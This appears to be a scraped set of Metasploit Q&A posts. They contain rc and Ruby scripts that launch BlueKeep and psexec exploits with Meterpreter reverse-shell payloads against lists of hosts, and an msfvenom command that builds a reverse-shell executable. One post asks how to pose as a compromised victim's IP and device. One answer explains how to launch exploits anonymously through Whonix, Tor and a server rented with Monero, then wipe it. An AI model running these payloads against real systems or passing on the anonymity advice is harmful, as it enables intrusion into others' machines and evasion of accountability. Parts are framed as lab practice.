metasploit – Rex::BindFailed The address is already in use or unavailable

I’m trying to run the following script based on https://www.pentestpartners.com/security-blog/scripting-metasploit-to-exploit-a-group-of-hosts-a-how-to/

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
setg autorunscript multi_console_command -rc /root/Desktop/folder/met_cmd_file 
setg lhost 192.168.0.90    
setg lport 4444
set ExitOnSession false 
exploit -j
use exploit/windows/rdp/rdp_bluekeep
set EXITFUNC thread
exploit -j

However, I’m getting these errors:

(*) Started reverse TCP handler on 192.168.0.90:4444 
(*) No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
resource (/root/Desktop/folder/con_cmd_file)> set EXITFUNC thread
EXITFUNC => thread
resource (/root/Desktop/folder/con_cmd_file)> exploit -j
(-) Exploit failed: One or more options failed to validate: RHOST.
(*) Exploit completed, but no session was created.
rhost => 192.168.0.40
(*) Exploit running as background job 1.
(*) Exploit completed, but no session was created.
rhost => 192.168.0.50
(-) Handler failed to bind to 192.168.0.90:4444:-  -
(-) Handler failed to bind to 0.0.0.0:4444:-  -
(-) Exploit failed (bad-config): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
(*) Exploit running as background job 2.
(*) Exploit completed, but no session was created.
rhost => 192.168.0.70
(-) Handler failed to bind to 192.168.0.90:4444:-  -
(-) Handler failed to bind to 0.0.0.0:4444:-  -
(-) Exploit failed (bad-config): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
(*) Exploit running as background job 3.
(*) Exploit completed, but no session was created.
rhost => 192.168.0.80
(*) Exploit running as background job 4.
(*) Exploit completed, but no session was created.
(-) Handler failed to bind to 192.168.0.90:4444:-  -
(-) Handler failed to bind to 0.0.0.0:4444:-  -
(-) Exploit failed (bad-config): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
(-) Handler failed to bind to 192.168.0.90:4444:-  -
(-) Handler failed to bind to 0.0.0.0:4444:-  -
(-) Exploit failed (bad-config): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).

I have tried what is suggested on Metasploit Starts attacking multiple targets, results in “address is already in use”

doing

netstat -anpl | grep :4444 I get

tcp        0      0 192.168.0.90:4444       0.0.0.0:*               LISTEN      1741/ruby

while doing
netstat -anpl | grep :4445 I get nothing

However, whether I use 4444 or 4445, the result is the same,

and when I run jobs in Metasploit I get

0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.0.90:4444

but can I kill this job if it is the payload?

How can this be fixed?

Run Metasploit module against several IPs

I’m trying to run a module against several IPs. It happens that usually we can use RHOSTS file:/file.txt but in this case, that option is not available.

I have tried this https://www.pentestpartners.com/security-blog/scripting-metasploit-to-exploit-a-group-of-hosts-a-how-to/

My iter_rc.rc file is like this:

<ruby>

# read one target address per line from the hosts file
hostsfile = "/root/folder/hosts_file.txt"
hosts = []   # an Array; "()" evaluates to nil in Ruby and push would fail
File.open(hostsfile, "r") do |f|
  f.each_line do |line|
    hosts.push line.strip
  end
end
# prepare the handler and console
self.run_single("resource /root/folder/con_cmd_file.txt")
# iterate through each host and run the exploit as a background job
hosts.each do |rhost|
  self.run_single("set rhost #{rhost}")
  self.run_single("exploit -j -z")
end

</ruby>

and my con_cmd_file.txt is like this:

use  <module>
setg autorunscript multi_console_command -rc /root/foldermet_cmd_file.txt
setg lhost <local ip>
set ExitOnSession false
run
set target 1
set disablepayloadhandler true

How can I do it?

I’m getting the following errors:

(-) Exploit failed: One or more options failed to validate: RHOST.
(*) Exploit completed, but no session was created.
resource (/root/folder/con_cmd_file.txt)> set target 1
target => 1
resource (/root/folder/con_cmd_file.txt)> set disablepayloadhandler true
disablepayloadhandler => true
rhost => ip1
(-) Exploit failed: An invalid argument was specified. Invalid target index.
rhost => ip2
(-) Exploit failed: An invalid argument was specified. Invalid target index.
rhost => ip3
(-) Exploit failed: An invalid argument was specified. Invalid target index.
rhost => ip4
(-) Exploit failed: An invalid argument was specified. Invalid target index.
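Both questions above hit the same two problems: a hosts list that is read by a small Ruby snippet inside an rc file, and a listener port that is already occupied when a second job tries to start its own handler (the Rex::BindFailed lines). The script below is an added example, not code from either question or from the pentestpartners post. It assumes nothing from Metasploit: it parses a hosts file the way the rc snippet does (skipping blanks, comments and duplicates), checks whether a local port can still be bound before a handler is started, extracts the owning process from `netstat -anpl` output such as the line quoted in the first question, and returns the console command sequence as an Array so it can be inspected before being handed to `run_single` inside msfconsole. The module name and the sample hosts are constructed placeholders.

```ruby
require 'socket'

# Returns true when the given address/port can still be bound locally, false
# when something already listens there (the condition Rex::BindFailed reports).
def port_free?(host, port)
  server = TCPServer.new(host, port)
  server.close
  true
rescue Errno::EADDRINUSE, Errno::EADDRNOTAVAIL, Errno::EACCES
  false
end

# Parses `netstat -anpl` text and returns the "pid/program" column of the
# socket listening on the given port, or nil when no such line exists.
def listener_of(netstat_text, port)
  netstat_text.each_line do |line|
    cols = line.split
    next unless cols[0].to_s.start_with?('tcp') && cols[5] == 'LISTEN'
    return cols[6] if cols[3].to_s.end_with?(":#{port}")
  end
  nil
end

# Reads a hosts file (one address per line). Blank lines and '#' comments are
# ignored, duplicates dropped, and only IPv4-looking entries are kept, so a
# stray line cannot turn into the "failed to validate: RHOST" error.
def read_hosts(text)
  text.each_line
      .map { |l| l.split('#').first.to_s.strip }
      .reject(&:empty?)
      .select { |h| h.match?(/\A\d{1,3}(\.\d{1,3}){3}\z/) }
      .uniq
end

# Builds the console command list: one multi/handler job is started first,
# then every per-host job is told not to open its own listener
# (DisablePayloadHandler), which is what avoids the bind failures.
# module_name is a placeholder; the caller supplies the real one.
def build_commands(hosts, lhost:, lport:, module_name:, payload:)
  cmds = [
    'use exploit/multi/handler',
    "set PAYLOAD #{payload}",
    "set LHOST #{lhost}",
    "set LPORT #{lport}",
    'set ExitOnSession false',
    'exploit -j -z',
    "use #{module_name}",
    "set PAYLOAD #{payload}",
    "set LHOST #{lhost}",
    "set LPORT #{lport}",
    'set DisablePayloadHandler true',
  ]
  hosts.each do |h|
    cmds << "set RHOSTS #{h}"
    cmds << 'exploit -j -z'
  end
  cmds
end

# Runs a command plan through whatever the caller passes in. Inside msfconsole
# the block would be `{ |c| self.run_single(c) }`; stand-alone it just prints.
def run_plan(cmds, &runner)
  runner ||= ->(c) { puts c }
  cmds.each { |c| runner.call(c) }
  cmds.length
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample input, not a real hosts file.
  sample_hosts = "# lab targets\n192.168.0.40\n\n192.168.0.40 # duplicate\n192.168.0.50\nnot-an-ip\n"
  hosts = read_hosts(sample_hosts)
  unless port_free?('0.0.0.0', 4444)
    puts 'port 4444 already bound; start only one handler or pick another LPORT'
  end
  plan = build_commands(hosts, lhost: '192.168.0.90', lport: 4444,
                        module_name: 'exploit/PLACEHOLDER/module',
                        payload: 'windows/x64/meterpreter/reverse_tcp')
  run_plan(plan)
end
```

The point of returning the command list instead of executing it is that the two fixes are visible before anything runs: `exploit -j -z` appears once for the handler and once per host, and `set DisablePayloadHandler true` precedes every per-host job, so a second `jobs` entry never competes for 4444.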

metasploit – Spoofing IP and/or machine from meterpreter

So, I have a meterpreter session with full rights. I wanted to know if there’s a way to either spoof my IP address so that when I visit a website or whatever, the IP they get is the victim’s instead of mine. Also, if possible, is there a way to “spoof the PC”? I mean, pretend to websites that I’m using the same device as the victim is.
Thanks in advance

metasploit – Metasploit6 – windows/smb/psexec with EXE::Custom and set DisablePayloadHandler

I’m new to Metasploit and started experimenting with PSEXEC. I generated a payload using msfvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe LHOST=192.168.0.15 LPORT=4545 -o shell.exe

and set it as follows: set EXE::Custom /home/kali/shell.exe

In my setup, the antivirus is turned off on my victim machine to avoid blocking the execution.

My problem is that if I set DisablePayloadHandler true and run the exploit, Metasploit gets stuck on Starting the service for a while then just exits without opening a session.

However, if I set DisablePayloadHandler false, it tells me that the service started successfully, a session opens then dies.

I’m confused because I thought the payload handler should be disabled for the exploit to work using a custom executable. How do I go about using a custom executable with psexec?

tor – is metasploit under whonix anonymous?

Whonix routes all of the network traffic via Tor, so theoretically speaking – yes. However, there are many other ways in which you can be de-anonymized. Just because you send your traffic over Tor, it doesn’t necessarily mean you’re 100% anonymous. For example, the actions you take on the hypothetical machine after the exploitation could de-anonymize you.

I would also advise against installing unnecessary things in Whonix since the process of downloading and installing the binaries could de-anonymize you in itself. A better way of doing this would be to use Whonix for your host (so your traffic is networked via Tor), rent a server with XMR, SSH to that server over Tor, install Metasploit on that server and then use that server to launch your exploit. Then wipe the server entirely when you’re done and burn any credentials, etc. Of course, this isn’t 100% foolproof either, since the actions you take on the server you’re running the exploit from could also de-anonymize you even if you’re using Tor and paid for the server in XMR.

There’s a lot of useful information about using Whonix correctly & safely in the Whonix documentation, I would highly advise you to read it. There’s also some advice on general opsec practices.

metasploit – How do you execute a base64 payload

metasploit – penetration testing For My WP site

metasploit – Reverse shells that work on every other machine do not connect back on dual booted laptop

I use Parrot OS for Hack the Box every single day, and recently transitioned to a dual boot setup. Ever since I changed over to this, no form of reverse shell connects back. Steps that I take on a cloud-based virtual machine produce a reverse shell, but absolutely nothing works on my laptop. I tried doing a reverse shell from my laptop back to myself, and it connects on netcat before immediately dropping out without any other information. Metasploit actually connects and can execute a single command before dying, though I’m not sure if this is just because I’m doing it to my own machine or if it’s part of the problem. If it’s relevant, I did use a patched kernel to enable some drivers for my specific laptop:

https://github.com/linux-surface/linux-surface

This is the full output for what happens when I try reverse shells from my laptop back to myself:

nc:

Listening on 0.0.0.0 4444
Connection received on *IP* 36754

And then it just closes.

Metasploit:

(*) Started reverse TCP handler on IP:4444 
(*) Command shell session 1 opened (IP:4444 -> IP:36760) at 2021-05-05 20:28:06 -0700

echo test
echo test
test

And then metasploit crashes and it returns to a bash prompt.

Please let me know if there is any information that is needed to help fix this; it’s become a very annoying issue.